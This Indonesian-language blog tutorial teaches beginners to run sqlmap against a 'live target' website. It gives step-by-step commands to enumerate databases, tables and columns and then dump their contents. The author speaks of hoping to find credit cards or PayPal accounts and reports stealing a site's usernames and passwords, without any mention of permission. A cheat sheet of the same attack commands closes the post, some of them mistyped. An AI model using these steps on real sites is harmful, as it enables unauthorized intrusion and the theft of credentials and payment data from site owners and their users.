Cara Menggunakan SQLMAP - SQLMap adalah alat uji penetrasi open source yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan injeksi SQL dan mengambil alih basis data server. Jadi sqlmap ini adalah tools yang dapat mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. Tools ini sudah banyak di gunakan dikalangan para pentester dari dulu hingga sekarang, syarat menggunakan tools ini adalah mengginstall python 2.7
Bahan :
1) Install python 2.7
2) Download sqlmap : https://github.com/sqlmapproject/sqlmap
3) Live target :
Klik HereNote :
- Jika kalian diwindows menggunakan cmd cara menjalankan toolsnya : python sqlmap.py [command]
- Jika di android/linux menggunakan terminal cara menjalankan toolsnya : ./sqlmap [command] atau sqlmap [command] atau sqlmap.py [command]
Tutorial :
1) Pertama kalian buka CMD/Terminal, setelah itu masuk ke directory dimana tools sqlmap kalian berada dan coba ketik perintah python sqlmap.py -h (untuk melihat command/perintah yang akan kita gunakan nanti)
2) Pertama kalian siapkan website vulnnya, setelah itu kita jalankan sqlmapnya dengan perintah : sqlmap -u http://site.com/ --dbs (pertama kita dump databasesnya)
3) Jika muncul seperti diatas kalian ketik : c , lalu enter saja
4) Jika muncul lagi seperti gambar diatas kalian ketik : Y , lalu tekan enter
5) Kalau muncul lagi kalian ketik : Y saja lagi, dan tunggu proses sqlmap berjalan jangan lupa pastikan koneksi internet anda stabil saat proses dump berjalan (lihat gambar ini)
6) Muncul seperti ini kalian ketik : Y , dan enter
7) Tunggu sebentar sampai proses selesai, dan kalau sudah selesai hasilnya akan muncul nama databases di website tersebut (seperti ini)
8) Nah proses selanjutnya adalah ngedump salah satu databases tersebut untuk melihat ada table apa saja didalam databasesnya, jangan dump databases information_schema karena setau saya didalam databases situ tidak ada apa apa jadi dump databases yang lainnya, command : sqlmap -u http://site.com/ -D namadatabases --tables
9) Tunggu sampai proses selesai, kalau sudah selesai maka akan nampak seperti ini
10) Selanjutnya adalah kita dump tables tersebut seterah kalian mau dump tables yang manapun mau 1 atau lebih dari 1 tables yang di dump juga boleh untuk melihat columns apa saja yang ada didalam tables tersebut, command : sqlmap -u http://site.com/ -D namadatabases -T namatables --columns atau sqlmap -u http://site.com/ -D namadatabases -T namatables,namatables2,namatables3 --columns (jika dump lebih dari 1 tables)
11) Tunggu sampai selesai, kalau sudah selesai nampak seperti ini
12) Databases sudah kita dump tables juga sudah columns sudah berarti yang terakhir adalah tinggal dump salah satu columns tersebut untuk melihat username atau password atau email atau credit card atau paypal yang ada di databases yang berhasil terinject seperti itu, disini saya kurang beruntung karena tidak mendapatkan credit card atau paypal tetapi disini saya mendapatkan username,password sebuah website tersebut. Command akhir : sqlmap -u http://site.com/ -D namadatabases -T namatables -C namacolumns,namacolumns --dump
13) Tunggu sebentar dan kalau sudah selesai juga berhasil kedump hasilnya akan seperti ini
Tara gimana mudah bukan cara menggunakan sqlmapnya hehee, ga ribet kok asal kalian ngerti + hafal commandnya saja pasti akan mudah karena ini berguna untuk membantu kalian semua dalam aktifitas pentest sebuah website yang memiliki vulnerability sql injection hehe. Untuk simple commandnya bisa dilihat dibawah ini !!!
Simple Command Using SQLMAP For Beginners :
- sqlmap -u http://site.com/ --dbs
- sqlmap -u http//:site.com/ -D namadatabases --tables
- sqlmap -u http//:site.com/ -D namadatabases -T namatables --columns
- sqlmap -u http//:site.com/ -D nama databases -T namatables -C namacolumns --dump
That nothing is hard unless we want to keep going
